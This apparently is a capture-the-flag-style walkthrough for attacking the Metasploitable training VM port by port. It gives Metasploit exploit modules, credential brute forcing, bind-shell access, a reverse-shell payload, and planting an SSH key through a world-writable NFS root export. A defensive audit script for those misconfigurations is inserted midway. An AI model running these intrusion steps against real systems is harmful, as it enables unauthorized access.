# Metasploitable OS Complete Solved


#### Port 21 & 2121

```
# Identify the FTP server version
auxiliary/scanner/ftp/ftp_version
# Exploit the vsftpd 2.3.4 backdoor
exploit/unix/ftp/vsftpd_234_backdoor

# Port 2121 (ProFTPD)
systemctl start postgresql   # Metasploit's database backend
auxiliary/scanner/ftp/ftp_login
ftp <ip> 2121
```

#### Port 22

```
auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/ssh/ssh_login
```

#### Port 23 & 1524

```
auxiliary/scanner/telnet/telnet_login
# Telnet is cleartext: use Wireshark to inspect login credentials on the wire

# Port 1524 is a bind shell left open on Metasploitable
ncat <ip> 1524
```

#### Port 25

```
# SMTP
auxiliary/scanner/smtp/smtp_enum
# Verify which enumerated users exist on the server

nc <ip> 25   # SMTP port
VRFY <username_enumerated>
```

#### Port 53 ISC BIND (DNS)

Port 53 is **used by DNS (Domain Name System)**. DNS resolves human-readable host names into numeric IP addresses, and BIND (*Berkeley Internet Name Domain*) is a commonly used DNS server that has had a rich history of security problems. As a result, BIND and port 53 are frequent targets, and a couple of worms have used BIND exploits to propagate.

```
https://www.exploit-db.com/exploits/6122/
auxiliary/spoof/dns/bailiwicked_domain
```

#### Apache HTTPd 80

* It hosts the DVWA on the Metasploitable OS, but the web server itself can also be exploited.

```
nbtscan -r <ip_range>/24
dirb http://<ip>/
http://<ip>/phpinfo.php
msf6 > use auxiliary/scanner/http/http_version
cadaver http://<ip>/dav/
# cadaver opens an interactive dav> prompt on the writable WebDAV share
```

#### PORT 111/ 2049 RPC Bind

* RPC: Remote Procedure Call (portmapper on 111)
* NFS: Network File System (2049)

```
rpcinfo -p <ip>
sudo mkdir -p /root/.ssh
cd /root/.ssh
# Generate an SSH key pair
ssh-keygen -t rsa -b 4096
# Mount the exported root filesystem
mount -o nolock -t nfs <ip>:/ /mnt

# List the mounted filesystems
df -k

cd /mnt/root/.ssh
cp /root/.ssh/<publickey>.pub /mnt/root/.ssh/

# To log in over SSH, the public key must be appended to the
# authorized_keys file on the target
cat <publickey>.pub >> authorized_keys

ssh -i /root/.ssh/<privatekey> root@<ip>
```

#### Port 5900 VNC Viewer

```
auxiliary/scanner/vnc/vnc_login
vncviewer <ip>
```

#### Port 139-445 NetBIOS SSN

```
auxiliary/scanner/smb/smb_version
exploit/multi/samba/usermap_script
```

#### Port 512 513 514

* These ports belong to the remote-login "r-services" (rexec, rlogin, rsh), which grant access based on host trust files rather than proper authentication.

```
sudo apt install rsh-client
rlogin -l root <ip>
```
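The NFS steps above only work because the root filesystem is exported to every host read-write without `root_squash`, and `rlogin -l root` only works because the trust files accept any host. The following audit script is an added example, not part of the original page; it parses `exports(5)` and `.rhosts`/`hosts.equiv`-style text and flags exactly those two misconfigurations. The sample file contents are constructed for the demo (modelled on a wide-open lab export); on a real host you would feed it `/etc/exports`, `/etc/hosts.equiv` and each user's `~/.rhosts`.

```python
import re

# Constructed sample files (not copied from any real host). The first export
# mirrors the wide-open root export the NFS walkthrough above depends on.
EXPORTS_SAMPLE = """\
/ *(rw,sync,no_root_squash,no_subtree_check)
/srv/share 10.0.0.0/24(ro,sync,root_squash)
/data (rw)
"""

RHOSTS_SAMPLE = """\
# constructed ~/.rhosts
+ +
buildhost alice
"""


def parse_exports(text):
    """Return (path, host, options) tuples from exports(5)-style text.
    A client with no host part, e.g. '(rw)', means 'every host'."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:]
        for client in clients:
            m = re.match(r"^([^(]*)(?:\((.*)\))?$", client)
            host = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, host, opts))
    return entries


def audit_exports(text):
    """Flag exports reachable from any host that also grant write access.
    exportfs defaults to ro and root_squash, so both must be set explicitly
    for the 'write a root authorized_keys over NFS' path to exist."""
    findings = []
    for path, host, opts in parse_exports(text):
        any_host = host.startswith("*")
        if any_host and "rw" in opts and "no_root_squash" in opts:
            findings.append(f"{path} exported to {host}: read-write without root_squash")
        elif any_host and "rw" in opts:
            findings.append(f"{path} exported to {host}: read-write (root is squashed)")
    return findings


def audit_rhosts(text, name="~/.rhosts"):
    """Flag '+' wildcards in .rhosts / hosts.equiv, which let rlogin/rsh
    skip the password check for every host and/or every user."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+" and user == "+":
            findings.append(f"{name}: trusts every user from every host")
        elif host == "+":
            findings.append(f"{name}: trusts every host")
        elif user == "+":
            findings.append(f"{name}: trusts every user from {host}")
    return findings


if __name__ == "__main__":
    for finding in audit_exports(EXPORTS_SAMPLE) + audit_rhosts(RHOSTS_SAMPLE):
        print("FINDING:", finding)
```

The fix on the NFS side is to export only the directories that need sharing, to named clients, and to keep the default `root_squash`; on the r-services side, remove the `rsh-server`/`rlogind` packages entirely and replace them with SSH.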

#### Port 1099 Java RMI server

```
auxiliary/scanner/misc/java_rmi_server
exploit/multi/misc/java_rmi_server
```

#### Port 3306

```
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login

# Bruteforcing gives us the password

mysql -u <user> -p -h <ip>

# Some MySQL commands
show databases;
use <database_name>;
show tables;
describe <table_name>;   # then read it with a SELECT query
```

#### Port 5432 Postgres

```
auxiliary/scanner/postgres/postgres_login
# Try the default postgres password
psql -h <ip> -U <username>
```

#### Port 6667 Internet Relay Chat (IRC)

```
service postgresql start   # Metasploit's database backend
exploit/unix/irc/unreal_ircd_3281_backdoor
# IRC was built to prevent flooding
show payloads
set payload cmd/unix/reverse_ruby
```

#### Port 8180 (Unknown)

* Port 8180 is used by the Apache Tomcat service, which runs Java web applications.

```
# Try the default Apache Tomcat credential lists available on GitHub
exploit/multi/http/tomcat_mgr_upload
```

***

\~ Ghoul

